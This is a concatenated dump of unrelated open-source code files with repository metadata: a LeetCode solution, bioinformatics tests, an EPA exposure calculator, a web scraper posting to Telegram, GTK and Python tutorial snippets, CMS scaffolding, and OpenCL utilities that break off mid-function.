Leet11_WaterContainer.py
|
1
|
1461
|
class Solution(object):
def maxArea(self, height):
"""
:type height: List[int]
:rtype: int
"""
if len(height) < 2:
return 0
if len(height) == 2:
return min(height[0], height[1])
#Try two pointers
start, end = [0, 1]
max_water = 0
max_idx = (0,0)
while start<= end:
#move end first
while end < len(height)-1:
cur_water = (end-start) * min(height[start], height[end])
if cur_water > max_water:
max_water = cur_water
max_idx = (start, end)
if cur_water < (end-start +1) * min(height[start], height[end+1]):
end += 1
else:
break
while start < len(height) and start < end:
cur_water = (end-start) * min(height[start], height[end])
if cur_water > max_water:
max_water = cur_water
max_idx = (start, end)
if cur_water < (end-start -1) * min(height[start+1], height[end]):
start += 1
else:
break
if end < len(height)-1:
end += 1
else:
if start < len(height):
start += 1
return max_idx
Solve = Solution()
print Solve.maxArea([1,1,3,1,5,1,6,2,3])
|
gpl-3.0
| 3,932,031,442,300,702,000 | 33.809524 | 83 | 0.421629 | false |
moonso/loqusdb
|
tests/plugins/mongo/test_get_sv.py
|
1
|
1095
|
from loqusdb.build_models.variant import build_variant
def test_get_insertion(small_insert_variant, mongo_adapter, case_obj):
adapter = mongo_adapter
## GIVEN a mongo adapter with a small insertion
variant = small_insert_variant
case_id = case_obj['case_id']
formated_variant = build_variant(
variant=variant,
case_obj=case_obj,
case_id=case_id
)
adapter.add_case(case_obj)
adapter.add_structural_variant(formated_variant)
for variant_obj in adapter.db.structural_variant.find():
assert variant_obj
def test_get_translocation(translocation_variant, mongo_adapter, case_obj):
adapter = mongo_adapter
## GIVEN a mongo adapter with a translocation
variant = translocation_variant
case_id = case_obj['case_id']
formated_variant = build_variant(
variant=variant,
case_obj=case_obj,
case_id=case_id
)
adapter.add_case(case_obj)
adapter.add_structural_variant(formated_variant)
for variant_obj in adapter.db.structural_variant.find():
assert variant_obj
|
mit
| -2,922,985,057,435,951,600 | 32.181818 | 75 | 0.683105 | false |
dazult/EPA-2012-Residential-Exposure-SOPs
|
sop_calcs/paintsop.py
|
1
|
1479
|
from collections import defaultdict
from exposure_profile import ExposureProfile
def paintsop(POD, LOC, bodyweight,dermal_absorption, SA_BW_ratio, surface_residue_concentration, fraction_of_body_exposed, daily_material_to_skin_transfer_efficency, exposure_time, hand_to_mouth_event_freqency):
#hand_to_mouth_event_freqency 13.9 indoor 20 outdoor
exposure_profile = ExposureProfile(bodyweight, POD, LOC, dermal_absorption=dermal_absorption)
for lifestage in ['adult','1_to_2']:
try:
exposure = surface_residue_concentration * SA_BW_ratio[lifestage] * fraction_of_body_exposed * daily_material_to_skin_transfer_efficency*bodyweight[lifestage]
except:
exposure = "Invalid"
exposure_profile.update('dermal','paint','',lifestage, exposure)
fraction_of_hand_mouthed = 0.13
hand_surface_area = 150.
replenishment_intervals = 4.
saliva_extraction_factor = 0.48
for lifestage in ['1_to_2']:
try:
exposure = surface_residue_concentration * daily_material_to_skin_transfer_efficency * fraction_of_hand_mouthed * hand_surface_area * replenishment_intervals * exposure_time
exposure *= (1. - ((1.-saliva_extraction_factor)**(hand_to_mouth_event_freqency/replenishment_intervals)))
except:
exposure = "Invalid"
exposure_profile.update('oral','paint','',lifestage, exposure)
return exposure_profile
def test():
pass
#
|
agpl-3.0
| 3,519,419,388,005,567,500 | 40.083333 | 211 | 0.688979 | false |
hopecream/vclusterBooter
|
src/lib/vmResult.py
|
1
|
3393
|
# Use this class to return the command
# execution results
class vmCommandResult:
def __init__(self):
self.retCode = 0
self.msg = ""
self.clusters = []
class vClusterInstance:
def __init__(self):
self.id = 0
self.vmNR = 0
# network format (public/private, name, ip, id)
self.networks = []
self.vmInstances = []
def __str__(self):
str = ""
str += "=================================================================================\n"
str += "vClusterID\t# of VM\t\n"
str += "---------------------------------------------------------------------------------\n"
str += "%d\t\t%d\n" % (int(self.id), int(self.vmNR))
str += "---------------------------------------------------------------------------------\n"
str += "Networks: \n"
str += "---------------------------------------------------------------------------------\n"
str += "ID\tName\t\tType\tMode\tIP \n"
for network in self.networks:
str += "%d\t%s\t%s\t%s\t%s\n" % \
(int(network.id), network.name[:15], network.type,\
network.mode, network.IP)
str += "\n"
str += "---------------------------------------------------------------------------------\n"
str += "Virtual Machines:\n"
str += "---------------------------------------------------------------------------------\n"
str += "ID\tName\t\tMemory(MB)\tStatus\tNetworks\t\tIP\tDisks\n"
str += "---------------------------------------------------------------------------------\n"
for vminst in self.vmInstances:
str += "%d\t%s\t\t%d\t%s\t" % (int(vminst.id), \
vminst.name[:15], int(vminst.memSize), vminst.status[:7])
spaceShift = "\t" * 6
maxLoop = max(len(vminst.networkName), len(vminst.disks), len(vminst.ips))
for i in range(maxLoop):
if i > 0:
str += spaceShift
if i < len(vminst.networkName):
network = vminst.networkName[i]
str += "%s\t" % (network[:15], )
else:
str += "\t" * 2
if i < len(vminst.ips):
ip = vminst.ips[i]
str += "%s\t" % (ip,)
else:
str += "\t" * 2
if i < len(vminst.disks):
disk = vminst.disks[i]
str += "%s\t" % (disk[:7], )
else:
str += "\t" * 2
str += "\n"
str += "=================================================================================\n"
return str
class vmInstance:
def __init__(self):
self.name = ""
self.status = "N/A"
self.id = 0
self.memSize = 0
self.networkName = []
self.ips = []
self.disks = []
class vNetInstance:
def __init__(self):
self.id = 0
self.name = ""
self.type = ""
self.mode = ""
self.IP = ""
# Prohabit it from running itself
if __name__ == '__main__':
pass
|
lgpl-3.0
| -8,133,564,602,829,689,000 | 32.594059 | 100 | 0.319481 | false |
flackr/quickopen
|
src/open_dialog_test.py
|
2
|
1664
|
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import db_test_base
import open_dialog
import os
import message_loop
import tempfile
import temporary_daemon
import ui_test_case
# Special indicator to TestRunner to only let us run when
# run_unit_tests is passed -m from the commandline.
requires_manual_handling = True
class FakeOptions(object):
def __init__(self, test_data_dir):
self.ok = True
self.lisp_results = False
self.results_file = None
self.current_filename = os.path.join(test_data_dir, "project1/foo.txt")
self.open_filenames = [os.path.join(test_data_dir, "project1/foo.txt")]
class OpenDialogTest(ui_test_case.UITestCase):
def setUp(self):
self.db_test_base = db_test_base.DBTestBase()
self.db_test_base.setUp()
self.daemon = temporary_daemon.TemporaryDaemon()
self.db = self.daemon.db_proxy
self.db.add_dir(self.db_test_base.test_data_dir)
self.options = FakeOptions(self.db_test_base.test_data_dir)
def tearDown(self):
self.daemon.close()
self.db_test_base.tearDown()
def test_open_dialog(self):
x = open_dialog.OpenDialog(self.options, self.db, "")
|
apache-2.0
| 6,669,859,397,826,754,000 | 33.666667 | 75 | 0.731971 | false |
BennehR/BennehBot
|
V3/UF_NoMansSky.py
|
1
|
3053
|
import asyncio
import datetime
import urllib.request
import requests
import sqlite3 as lite
from bs4 import BeautifulSoup
import json
NMSVers = []
def printMsg(msg):
print("UF_NMS: " + str(msg))
def get_url(url):
response = requests.get(url)
content = response.content.decode("utf8")
return content
def TelegramUpdate(updateInfo, JSONData):
for token in JSONData["Tokens"]["Telegram"]["ChatID"]:
url = "https://api.telegram.org/bot{}/sendMessage?chat_id={}&text={}".format(JSONData["Tokens"]["Telegram"]["BotToken"], next(iter(token.keys())), updateInfo)
printMsg(url)
get_url(url)
async def NMSVerListSetup():
NMSVers.clear()
printMsg('Refreshing version list')
try:
con = lite.connect('BennehBotDB.db')
cur = con.cursor()
cur.execute("SELECT PatchName FROM NMS_Versions")
i = 0
for versions in cur:
NMSVers.append(versions[0])
except lite.Error as e:
return('Unhandled connection error \n' + e.message)
finally:
con.close()
async def NMSVersionCheck():
while True:
with open('config.json') as json_data:
JSONConfig = json.load(json_data)
await NMSVerListSetup()
printMsg('List updated')
UrlHeader = 'https://www.nomanssky.com/'
page = requests.get('https://www.nomanssky.com/release-log/')
data = page.text
soup = BeautifulSoup(data, 'html.parser')
updateEntries = soup.find_all('a', {"class" : "link link--inherit"})
i = 0
for entry in updateEntries:
updateText = entry.find("h2", recursive=True)
updateText = updateText.text
updateURL = entry.attrs['href']
#This section checks if the URL starts with https, corrects if not
if "http" not in updateURL:
updateURL = UrlHeader + updateURL[1:]
dateStamp = str(datetime.datetime.now())
if updateText not in NMSVers:
printMsg('New entry')
updateInfo = updateText + " - " + updateURL + " - " + dateStamp
printMsg(updateInfo)
TelegramUpdate(updateInfo, JSONConfig)
try:
printMsg('Connecting...')
con = lite.connect('BennehBotDB.db')
printMsg('Connected!')
cur = con.cursor()
printMsg('Adding to DB...')
cur.execute("INSERT INTO NMS_Versions VALUES(?,?,?)", (updateText, updateURL, dateStamp))
printMsg('Committing...')
con.commit()
printMsg('Entry added to DB')
except Exception as e:
return("Unhandled connection error \n" + str(e))
except lite.Error as e:
return('Unhandled connection error \n' + e.message)
finally:
con.close()
printMsg('UF_NMS done.')
await asyncio.sleep(900)
|
mit
| -7,510,132,966,384,543,000 | 32.56044 | 166 | 0.562398 | false |
dmccloskey/io_utilities
|
io_utilities/base_exportData.py
|
1
|
3964
|
import csv, sys, json, io
#System dependencies (write_binaryFile)
import shutil
#System dependencies (compressed files)
import zipfile, gzip, bz2, tarfile
class base_exportData():
"""a class to export data"""
def __init__(self,data_I=[]):
if data_I: self.add_data(data_I);
else: self.data = [];
def add_data(self,data_I):
"""add data"""
self.data = data_I;
def clear_data(self):
"""clear existing data"""
#del self.data[:];
self.data = None;
def write_dict2csv(self,filename,headers=None):
# write dict to csv
with open(filename, 'w',newline='') as f:
if headers: fieldname = headers;
else: fieldname = list(self.data[0].keys())
writer = csv.DictWriter(f, fieldnames = fieldname)
try:
writer.writeheader();
writer.writerows(self.data);
except csv.Error as e:
sys.exit(e);
def write_dict2json(self,filename):
# write dict to json file
with open(filename, 'w',newline='') as outfile:
json.dump(self.data, outfile, indent=4);
def write_dict2tsv(self,filename):
# write dict to tsv
with open(filename, 'w',newline='') as f:
writer = csv.DictWriter(f,fieldnames = list(self.data[0].keys()),dialect = 'excel-tab')
try:
writer.writeheader();
writer.writerows(self.data);
except csv.Error as e:
sys.exit(e);
def write_headerAndColumnsAndElements2csv(self,header_I,columns_I,filename):
# make header
header = [''];
header.extend(header_I);
# make rows
rows = self.data;
for i in range(len(columns_I)):
rows[i].insert(0,columns_I[i]);
with open(filename, 'w',newline='') as f:
writer = csv.writer(f);
try:
writer.writerow(header);
writer.writerows(rows);
except csv.Error as e:
sys.exit(e);
def write_headersAndElements2csv(self,header_I,filename):
# write data to csv file
with open(filename, 'w',newline='') as f:
writer = csv.writer(f);
try:
writer.writerows(header_I);
writer.writerows(self.data);
except csv.Error as e:
sys.exit(e);
def write_headersAndElements2txt(self,header_I,filename):
# write data to txt file
with open(filename, 'w',newline='') as f:
writer = csv.writer(f, delimiter='\t');
try:
writer.writerows(header_I);
writer.writerows(self.data);
except csv.Error as e:
sys.exit(e);
def write_dict2js(self,filename,varname):
# write dict to js file
json_str = 'var ' + varname + ' = ' + json.dumps(self.data);
with open(filename,'w') as file:
file.write(json_str);
def write_binaryFile(self,filename,length=131072):
'''Write a binary file stream to disk
INPUT:
filename = string
self.data = binary file stream
length = chunks of memory to write to disk
'''
##write from the start of the file
#file.seek(0)
if type(self.data)==type(b''):
data = io.BytesIO(self.data)
elif type(self.data)==type(io.BytesIO()):
data = self.data;
with open(filename,mode='wb') as f:
shutil.copyfileobj(data, f, length=length)
def write_binary2gz(self,filename,length=131072):
'''Write a binary file stream to disk in gz compression
INPUT:
filename = string
self.data = binary file stream
length = chunks of memory to write to disk
'''
with gzip.open(filename, 'wb') as f:
shutil.copyfileobj(self.data, f, length=length)
|
mit
| 1,311,515,058,507,463,700 | 32.863248 | 99 | 0.549218 | false |
Programmica/pygtk-tutorial
|
examples/applicationmenu.py
|
1
|
1388
|
#!/usr/bin/env python
import gtk
class ApplicationMenu(gtk.Window):
def __init__(self):
gtk.Window.__init__(self)
self.set_title("Application Menu")
self.connect("destroy", gtk.main_quit)
self.add(menubar)
menubar = gtk.MenuBar()
menuitemFile = gtk.MenuItem("File")
menubar.append(menuitemFile)
menuFile = gtk.Menu()
menuitemFile.set_submenu(menuFile)
menuitemOpen = gtk.MenuItem("Open")
menuFile.append(menuitemOpen)
menuitemSave = gtk.MenuItem("Save")
menuFile.append(menuitemSave)
menuitemQuit = gtk.MenuItem("Quit")
menuFile.append(menuitemQuit)
menuitemEdit = gtk.MenuItem("Edit")
menubar.append(menuitemEdit)
menuEdit = gtk.Menu()
menuitemEdit.set_submenu(menuEdit)
menuitemCut = gtk.MenuItem("Cut")
menuEdit.append(menuitemCut)
menuitemCopy = gtk.MenuItem("Copy")
menuEdit.append(menuitemCopy)
menuitemPaste = gtk.MenuItem("Paste")
menuitemPaste.append(menuitemPaste)
menuitemHelp = gtk.MenuItem("Help")
menubar.append(menuitemHelp)
menuHelp = gtk.Menu()
menuitemHelp.set_submenu(menuHelp)
menuitemAbout = gtk.MenuItem("About")
menuHelp.append(menuitemAbout)
window = ApplicationMenu()
window.show_all()
gtk.main()
|
cc0-1.0
| 5,636,652,511,959,924,000 | 25.692308 | 46 | 0.633285 | false |
marteki/retirement
|
setup.py
|
1
|
2087
|
import os
from setuptools import setup, find_packages
from subprocess import call
from setuptools import Command
from distutils.command.build_ext import build_ext as _build_ext
from setuptools.command.bdist_egg import bdist_egg as _bdist_egg
def read_file(filename):
"""Read a file into a string"""
path = os.path.abspath(os.path.dirname(__file__))
filepath = os.path.join(path, filename)
try:
return open(filepath).read()
except IOError:
return ''
class build_frontend(Command):
""" A command class to run `frontendbuild.sh` """
description = 'build front-end JavaScript and CSS'
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
print __file__
call(['./frontendbuild.sh'],
cwd=os.path.dirname(os.path.abspath(__file__)))
class build_ext(_build_ext):
""" A build_ext subclass that adds build_frontend """
def run(self):
self.run_command('build_frontend')
_build_ext.run(self)
class bdist_egg(_bdist_egg):
""" A bdist_egg subclass that runs build_frontend """
def run(self):
self.run_command('build_frontend')
_bdist_egg.run(self)
setup(
name='retirement',
version='0.4.52',
author='CFPB',
author_email='tech@cfpb.gov',
maintainer='cfpb',
maintainer_email='tech@cfpb.gov',
packages=['retirement_api'],
include_package_data=True,
description=u'Retirement app and api',
classifiers=[
'Topic :: Internet :: WWW/HTTP',
'Intended Audience :: Developers',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Framework :: Django',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
long_description=read_file('README.md'),
zip_safe=False,
cmdclass={
'build_frontend': build_frontend,
'build_ext': build_ext,
'bdist_egg': bdist_egg,
},
)
|
cc0-1.0
| -7,705,016,357,430,789,000 | 26.460526 | 64 | 0.618112 | false |
amboycharlie/Child-Friendly-LCMS
|
leonardo/module/web/utils/scaffold_web.py
|
1
|
6833
|
import logging
import os
import requests
import six
from django.conf import settings
from django.contrib.auth import authenticate, login
from django.contrib.auth.models import User
from horizon_contrib.common import get_class
from ..models import (Page, PageColorScheme, PageTheme, WidgetBaseTheme,
WidgetContentTheme, WidgetDimension)
LOG = logging.getLogger('leonardo')
LEONARDO_BOOTSTRAP_DIR = getattr(settings, 'LEONARDO_BOOTSTRAP_DIR', None)
def _load_from_stream(stream):
result = None
try:
import yaml
result = yaml.load(stream)
except:
pass
else:
return result
try:
import json
result = json.load(stream)
except:
pass
else:
return result
return result
def get_loaded_scripts(directory=LEONARDO_BOOTSTRAP_DIR):
"""return dictionary of loaded scripts from specified directory
"""
scripts = {}
if not directory:
raise Exception("You must set LEONARDO_BOOTSTRAP_DIR"
" absolute path to bootstrap scripts")
for root, dirnames, filenames in os.walk(directory):
for file_name in filenames:
try:
ext = file_name.split('.')[1]
with open(os.path.join(directory, file_name), 'r') as file:
scripts[file_name] = _load_from_stream(file)
except Exception as e:
LOG.exception('Error in during loading {} file with {}'.format(
file_name, str(e)))
return scripts
def _handle_regions(regions, feincms_object):
for region, widgets in six.iteritems(regions):
for widget_cls, widget_attrs in six.iteritems(widgets):
try:
WidgetCls = get_class(widget_cls)
except Exception as e:
raise Exception('Cannout load {} with {}'.format(
widget_cls, e))
# TODO create form and validate options
w_attrs = widget_attrs.get('attrs', {})
w_attrs.update({
'parent': feincms_object,
'region': region,
'ordering': 0
})
w_attrs['content_theme'] = WidgetContentTheme.objects.get(
name=w_attrs['content_theme'],
widget_class=WidgetCls.__name__)
w_attrs['base_theme'] = WidgetBaseTheme.objects.get(
name=w_attrs['base_theme'])
widget = WidgetCls(**w_attrs)
widget.save(created=False)
for size, width in six.iteritems(
widget_attrs.get('dimenssions', {})):
WidgetDimension(**{
'widget_id': widget.pk,
'widget_type': widget.content_type,
'size': size,
'width': width
}).save()
def create_new_site(run_syncall=False, with_user=True, request=None,
name='demo.yaml', url=None):
"""load all available scripts and try scaffold new site from them
TODO(majklk): refactor and support for more cases
"""
if run_syncall:
from django.core import management
management.call_command('sync_all', force=True)
if url:
try:
BOOTSTRAP = _load_from_stream(requests.get(url).text)
except Exception as e:
raise e
else:
try:
scripts = get_loaded_scripts()
BOOTSTRAP = scripts[name]
except KeyError:
raise Exception('Cannot find {} in {} loaded from {}'.format(
name, scripts, LEONARDO_BOOTSTRAP_DIR))
root_page = None
for username, user_attrs in six.iteritems(BOOTSTRAP.pop('auth.User', {})):
# create and login user
if with_user and not User.objects.exists():
User.objects.create_superuser(
username, user_attrs['mail'], user_attrs['password'])
# login
if request:
auth_user = authenticate(
username=username, password=user_attrs['password'])
login(request, auth_user)
for page_name, page_attrs in six.iteritems(BOOTSTRAP.pop('web.Page', {})):
page_theme_name = page_attrs.pop('theme', '__first__')
page_color_scheme_name = page_attrs.pop('color_scheme', '__first__')
regions = page_attrs.pop('content', {})
if not (PageTheme.objects.exists() or
PageColorScheme.objects.exists()):
raise Exception("You havent any themes \
please install someone and run sync_all")
try:
if page_theme_name == '__first__':
theme = PageTheme.objects.first()
else:
theme = PageTheme.objects.get(name=page_theme_name)
except PageTheme.DoesNotExist:
raise Exception(
"Page theme %s not found" % page_theme_name)
except Exception as e:
raise Exception(
"Page theme find more than one PageTheme for %s not found" % page_theme_name)
else:
page_attrs['theme'] = theme
try:
if page_color_scheme_name == '__first__':
color_scheme = PageColorScheme.objects.first()
else:
color_scheme = PageColorScheme.objects.get(
name__icontains=page_color_scheme_name)
except PageColorScheme.DoesNotExist:
raise Exception("Page Color Scheme %s "
"not found" % page_color_scheme_name)
else:
page_attrs['color_scheme'] = color_scheme
page, created = Page.objects.get_or_create(**page_attrs)
# TODO from attrs etc..
root_page = page
_handle_regions(regions, page)
# generic stuff
for cls_name, entries in six.iteritems(BOOTSTRAP):
for entry, cls_attrs in six.iteritems(entries):
cls = get_class(cls_name)
regions = cls_attrs.pop('content', {})
# load FK from
# author: {'pk': 1, 'type': 'auth.User'}
for attr, value in six.iteritems(cls_attrs):
if isinstance(value, dict):
cls_type = value.get('type', None)
if cls_type:
try:
cls_attrs[attr] = get_class(
cls_type).objects.get(pk=value.get('pk'))
except Exception as e:
raise Exception(
'Cannot load FK {} not Found original exception {}'.format(cls_type, e))
instance, created = cls.objects.get_or_create(**cls_attrs)
_handle_regions(regions, instance)
return root_page
|
apache-2.0
| -4,611,583,708,445,378,000 | 30.344037 | 104 | 0.547197 | false |
j-faria/OPEN
|
OPEN/test/test_ext.py
|
1
|
1396
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2013 João Faria
# This file is part of OPEN which is licensed under the MIT license.
# You should have received a copy of the license along with OPEN. See LICENSE.
#
from numpy import linspace, zeros_like, ones_like, savetxt
import difflib
def test_periodogram_ext():
""" Test extensions related to periodograms """
try:
from ..ext import blombscargle
except ImportError, e:
raise e
def test_rv_ext():
""" Test extensions related to building rv curves """
# test imports
try:
from ..ext.get_rvN import get_rvn
from ..ext.get_rv import get_rv
from ..ext.get_rvN_MultiSite import get_rvn as get_rvn_ms
except ImportError, e:
raise e
times = linspace(2449460, 2452860, 100)
vel1 = zeros_like(times)
vel2 = zeros_like(times)
vel3 = zeros_like(times)
get_rv(times, 1425, 10, 0.9, 0.2, 2452000, vel1)
get_rvn(times, [1425, 13], [10, 3], [0.9, 0.02], [0.2, 0.3], [2452000, 2451000], 0., vel2)
observ = ones_like(times)
observ[50:] = 2
get_rvn_ms(times, [1425, 13], [10, 3], [0.9, 0.02], [0.2, 0.3], [2452000, 2451000], [0., 10.], observ, vel3)
savetxt('out_test.txt', zip(times, vel1, vel2))
f1 = open('out_normal.txt')
f2 = open('out_test.txt')
diff = difflib.SequenceMatcher(None, f1.read(), f2.read())
assert diff.ratio() == 1., 'Non-normal RV curve building: something is wrong with get_rv or get_rvn extensions'
|
mit
| 2,562,638,030,816,605,700 | 29.347826 | 112 | 0.671685 | false |
wh20160213/WuhuaLearnToPython
|
python_study_level1/package1/study9_class.py
|
1
|
2025
|
#类定义
class people:
#定义基本属性
name = ''
age = 0
#定义私有属性,私有属性在类外部无法直接进行访问
__weight = 0
#定义构造方法
def __init__(self,n,a,w):
self.name = n
self.age = a
self.__weight = w
def speak(self):
print("%s 说: 我 %d 岁。" %(self.name,self.age))
#单继承示例
class student(people):
grade = ''
def __init__(self,n,a,w,g):
#调用父类的构函
people.__init__(self,n,a,w)
self.grade = g
#覆写父类的方法
def speak(self):
print("%s 说: 我 %d 岁了,我在读 %d 年级"%(self.name,self.age,self.grade))
#另一个类,多重继承之前的准备
class speaker():
topic = ''
name = ''
def __init__(self,n,t):
self.name = n
self.topic = t
def speak(self):
print("我叫 %s,我是一个演说家,我演讲的主题是 %s"%(self.name,self.topic))
#多重继承
class sample(speaker,student):
a =''
def __init__(self,n,a,w,g,t):
student.__init__(self,n,a,w,g)
speaker.__init__(self,n,t)
test = sample("Tim",25,80,4,"Python")
print('#########方法名同,默认调用的是在括号中前一个父类的方法')
test.speak()
class Parent: # 定义父类
def myMethod(self):
print ('调用父类方法')
class Child(Parent): # 定义子类
def myMethod(self):
print ('调用子类方法')
c = Child() # 子类实例
print('#######Python没有引用的概念,实例哪个类,就用哪个类方法')
c.myMethod() # 子类调用重写方法
class PrivatePublic:
def pubFun(self):
print('this is pub')
def __priFun(self):
print('private only')
pubAttr=0;
privateAttr=-1;
testpp = PrivatePublic()
testpp.pubFun()
print(testpp.pubAttr)
#testpp.__priFun()
#print(testpp.privateAttr)
|
lgpl-3.0
| 4,749,050,523,058,294,000 | 19.855263 | 72 | 0.51776 | false |
sgaebel/GAPS
|
gaps/utilities.py
|
1
|
19295
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Assorted auxiliary functions.
These include (amongst other things) helper functions for creating
GPU buffers, compiling kernels, checking the availability of 64bit
floats, printing available devices and platform with detailed
information.
@author: Sebastian M. Gaebel
@email: sebastian.gaebel@ligo.org
"""
from .auxiliary_sources import basic_code
import numpy as np
import pyopencl as ocl
BUILD_OPTIONS = ['-cl-fp32-correctly-rounded-divide-sqrt',
'-Werror']
def digest_user_data(data, cdouble_t):
"""Ensures that user data is either None, a numpy array, or a
collection of numpy arrays. All array are converted to `cdouble`.
Additionally, the OpenCL code to be inserted in the function
signature is generated."""
if data is None:
user_data = []
func_name = ''
func_call = ''
return user_data, func_name, func_call
if isinstance(data, np.ndarray):
c_shape = ''.join('[{}]'.format(x) for x in data.shape)
user_data = [data.astype(cdouble_t)]
func_name = 'user_data_0'.format(c_shape)
func_def = '__global const cdouble {}{}'.format(func_name, c_shape)
return user_data, ', '+func_name, ', '+func_def
if isinstance(data, (list, tuple)):
user_data = []
func_names = []
func_defs = []
for idx, element in enumerate(data):
converted = np.array(element, dtype=cdouble_t)
c_shape = ''.join('[{}]'.format(x) for x in converted.shape)
func_name = 'user_data_{}'.format(idx)
user_data.append(converted)
func_defs.append('__global const cdouble {}{}'.format(func_name,
c_shape))
func_names.append(func_name)
func_names = ', ' + (', '.join(func_names))
func_defs = ', ' + (', '.join(func_defs))
return user_data, func_names, func_defs
raise TypeError('User data type {!r} is not recognised.'
''.format(type(data)))
def create_read_buffer(context, host):
"""Shorthand for creating a read-only buffer on the GPU."""
# TODO: Figure out what exactly COPY_HOST_PTR does.
flags = ocl.mem_flags.READ_ONLY | ocl.mem_flags.COPY_HOST_PTR
return ocl.Buffer(context, flags, hostbuf=host)
def create_write_buffer(context, host):
"""Shorthand for creating a write-only buffer on the GPU."""
return ocl.Buffer(context, ocl.mem_flags.WRITE_ONLY, host.nbytes)
def cdouble(queue):
"""Helper which checks if 'fp64' is mentioned in the extensions of
the device associated with the given queue, i.e. if support for
for 64-bit floats is available."""
if 'fp64' in queue.device.get_info(ocl.device_info.EXTENSIONS):
return np.float64
else:
return np.float32
def cfloat(queue=None):
"""Currently, cfloat is always `np.float32`."""
return np.float32
def cshort(queue=None):
"""Currently, cshort is always `np.float16`."""
return np.float16
def compile_kernel(context, queue, source_code, function_name,
compiler_flags=None):
"""Compile the kernel given in `source_code` together with
the GAPS math definitions and functions, and cdouble definition.
Compiler flags can be given in addition to the default flags
defined in `utilities.py`."""
if cdouble(queue)(42).nbytes >= 8:
type_definitions = """
#define cdouble double
"""
else:
print('WARNING: no 64bit float support available for this device.')
type_definitions = """
#define cdouble float
"""
# The definition of cfloat and cshort is fixed for now since I do
# not know of any cases where these are not available. If this
# happens to be the case, we can add a check as for double here.
type_definitions += """
#define cfloat float
#define cshort short
"""
flags = BUILD_OPTIONS[:]
if compiler_flags is not None:
flags.extend(compiler_flags)
full_source = type_definitions + basic_code() + source_code
program = ocl.Program(context, full_source).build(flags)
return getattr(program, function_name)
def create_context_and_queue(platform_idx=None, device_idx=None):
"""
Convenience function to create the OpenCL context and queue needed
to create buffers and create and call kernels.
Parameters
----------
platform_idx : int or None
device_idx : int or None
Indices of the chosen OpenCL platform and device on that
platform. If both are None the device is chosen via
`pyopencl.creat_some_context()`. Default: None.
Returns
-------
context, queue : tuple
OpenCL context and the associated command queue.
Raises
------
TODO: unavailable devices or platforms
"""
if platform_idx is None:
if device_idx is None:
context = ocl.create_some_context()
queue = ocl.CommandQueue(context)
return context, queue
platform_idx = 0
if device_idx is None:
device_idx = 0
available_platforms = ocl.get_platforms()
if len(available_platforms) < 1:
raise ValueError('No platform found.')
elif len(available_platforms) <= platform_idx:
raise IndexError('Index {} invalid for {} available platforms.'
''.format(platform_idx, len(available_platforms)))
platform = available_platforms[platform_idx]
available_devices = platform.get_devices()
if len(available_devices) < 1:
raise ValueError('No device found.')
elif len(available_devices) <= device_idx:
raise IndexError('Index {} invalid for {} available devices.'
''.format(device_idx, len(available_devices)))
device = available_devices[device_idx]
context = ocl.Context([device])
queue = ocl.CommandQueue(context)
return context, queue
def memory_size(n_bytes, *, SI=False, template='{:.2f} {} ({} B)'):
"""Converting a number of bytes into human readable units.
Copied from `shed`.
Parameters
----------
n_bytes : int
Number of bytes.
SI : bool
Whether to use binary units (base 1024) or SI units
(base 1000). Keyword only argument. Default: False.
template : string
Template used to print the formatted memory size.
Default: '{:.2f} {} ({} B)'.
Returns
-------
value : string
Formatted string.
"""
if n_bytes < 0:
raise ValueError('Memory sizes may not be negative: {!r}'
''.format(n_bytes))
if SI:
units = ['B', 'kB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB']
base = 1000
else:
units = ['B', 'kiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB']
base = 1024
*units, final_unit = units
if n_bytes < base:
return '{:.0f} B'.format(n_bytes)
n_units = n_bytes
for unit in units:
if n_units < base:
break
n_units /= base
else:
unit = final_unit
return template.format(n_units, unit, n_bytes)
def device_limitations(device):
limitations = dict(
global_memory=device.get_info(ocl.device_info.GLOBAL_MEM_SIZE),
local_memory=device.get_info(ocl.device_info.LOCAL_MEM_SIZE),
constant_memory=device.get_info(ocl.device_info.MAX_CONSTANT_BUFFER_SIZE),
alloc_size=device.get_info(ocl.device_info.MAX_MEM_ALLOC_SIZE),
group_size=device.get_info(ocl.device_info.MAX_WORK_GROUP_SIZE))
return limitations
def compute_group_size(device, n_dim, cfloat_t):
local_avail = device_limitations(device)['local_memory']
max_group_size = local_avail / (2*(n_dim+1)*cfloat_t(1.0).nbytes)
ideal_group_size = 2**np.floor(np.log2(max_group_size))
if int(1.5*ideal_group_size) < max_group_size:
ideal_group_size = int(1.5*ideal_group_size)
if ideal_group_size > device_limitations(device)['group_size']:
ideal_group_size = device_limitations(device)['group_size']
return int(ideal_group_size)
def print_devices(detail_level=0):
"""
Print all platforms and device available, optionall with detailed
device information.
Parameters
----------
details : int
If >0, the function also prints device properties. Higher
levels correspond to more (and less important) detail.
A recommended level of detail for kernal design is 2-3.
Maximum level is 5. Default: 0.
Returns
-------
None
Notes
-----
The (rough) guideline for the different levels of detail is:
* 0 Platform and device names only
* 1 Basic and essential
* 2 Impacts use strongly
* 3 Impacts use weakly
* 4 Fine detail
* 5 Rarely available, vendor specific, or deemed largely useless
"""
if detail_level < 0:
raise ValueError('Negative detail level: {!r}'.format(detail_level))
if detail_level < 1:
for platform_idx, platform in enumerate(ocl.get_platforms()):
print('Platform [{}]: {} ({})'.format(platform_idx, platform.name,
platform.version))
for device_idx, device in enumerate(platform.get_devices()):
print(' Device [{}]: {}'.format(device_idx, device.name))
print() # Additional line as seperator for readability
return
# Specialised formatting functions for specific pieces of information.
# Device type macros (used for ocl.device_info.TYPE):
def device_type(info):
"""Translating the bit map into human readable categories."""
options = {(1 << 0): 'CL_DEVICE_TYPE_DEFAULT',
(1 << 1): 'CL_DEVICE_TYPE_CPU',
